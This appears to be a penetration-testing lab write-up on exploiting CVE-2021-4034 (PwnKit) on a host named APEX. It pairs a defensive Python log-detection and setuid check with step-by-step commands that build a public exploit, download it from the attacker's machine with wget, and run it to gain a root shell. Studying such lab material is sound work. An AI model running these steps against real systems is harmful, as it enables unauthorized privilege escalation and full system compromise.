CVE-2021-4034


PEAS has identified that the target system is vulnerable to CVE-2021-4034

The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec lets non-privileged processes communicate with privileged ones and provides a controlled, authorized way to run commands with elevated privileges, similar to sudo.

A memory corruption flaw is triggered when pkexec is run with no arguments. By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
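Added here as a defender's example (not from the original writeup or the berdav repository): pkexec validates the SHELL environment variable against /etc/shells and logs a fixed message when it is not listed, and the public PwnKit exploits deliberately trigger that path, so the message in auth.log or the journal is a usable detection signal. The log lines are constructed for this example, and the helper names `find_pwnkit_indicators` and `pkexec_is_setuid` are assumptions of the example.

```python
import os
import re
import stat
from typing import Dict, List

# Fixed message pkexec writes to syslog (auth facility) and stderr when SHELL
# is not an entry in /etc/shells; printing it is what triggers the malicious
# gconv module load, so exploit attempts leave this line behind.
PKEXEC_SHELL_MSG = "The value for the SHELL variable was not found the /etc/shells file"

# Constructed sample auth.log excerpt for demonstration; not captured from a real host.
SAMPLE_AUTH_LOG = """\
Jan 26 10:12:01 apex pkexec[2137]: www-data: Executing command [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=/usr/bin/id]
Jan 26 10:12:04 apex pkexec[2141]: The value for the SHELL variable was not found the /etc/shells file
Jan 26 10:12:05 apex sshd[2150]: Accepted publickey for admin from 192.168.196.10 port 51234 ssh2
Jan 26 10:12:09 apex pkexec[2163]: The value for the SHELL variable was not found the /etc/shells file
"""

# Classic syslog line layout: "<Mon DD HH:MM:SS> <host> pkexec[<pid>]: <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"pkexec\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)


def find_pwnkit_indicators(log_text: str) -> List[Dict[str, str]]:
    """Return one record per pkexec line carrying the SHELL-validation message."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("msg").strip() == PKEXEC_SHELL_MSG:
            hits.append({"timestamp": m.group("ts"), "host": m.group("host"), "pid": m.group("pid")})
    return hits


def pkexec_is_setuid(path: str = "/usr/bin/pkexec") -> bool:
    """True if pkexec still carries the setuid bit; the usual interim mitigation
    while patching is to drop it (chmod 0755), which makes the flaw unexploitable."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


if __name__ == "__main__":
    for hit in find_pwnkit_indicators(SAMPLE_AUTH_LOG):
        print(f"possible CVE-2021-4034 attempt: {hit}")
    print("pkexec setuid:", pkexec_is_setuid())
```

Absence of the message is not proof that no attempt was made, since the logging depends on the exploit variant; the setuid check and the vendor patch are the reliable side of the picture.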

Exploit

Exploit found online

www-data@APEX:/dev/shm$ gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
 
Please ask your administrator.

No compiler is installed on the target, so the exploit is compiled elsewhere and transferred over.

Docker Exploit Development

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name apex ubuntu:18.04
root@fd24fdfb2c75:/# apt update -y ; apt install nano gcc gcc-multilib make git wget -y ; cd root/host
root@fd24fdfb2c75:~/host# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034 ; make
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Unpacking objects: 100% (92/92), done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
root@fd24fdfb2c75:~/host/CVE-2021-4034# cd ..; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

Exploitation

www-data@APEX:/dev/shm$ wget -q http://192.168.45.215/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
www-data@APEX:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
whoami
root
hostname
APEX
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.196.145  netmask 255.255.255.0  broadcast 192.168.196.255
        ether 00:50:56:9e:56:a6  txqueuelen 1000  (Ethernet)
        RX packets 20432  bytes 4713899 (4.7 MB)
        RX errors 0  dropped 36  overruns 0  frame 0
        TX packets 2146  bytes 524530 (524.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 552  bytes 40524 (40.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 552  bytes 40524 (40.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise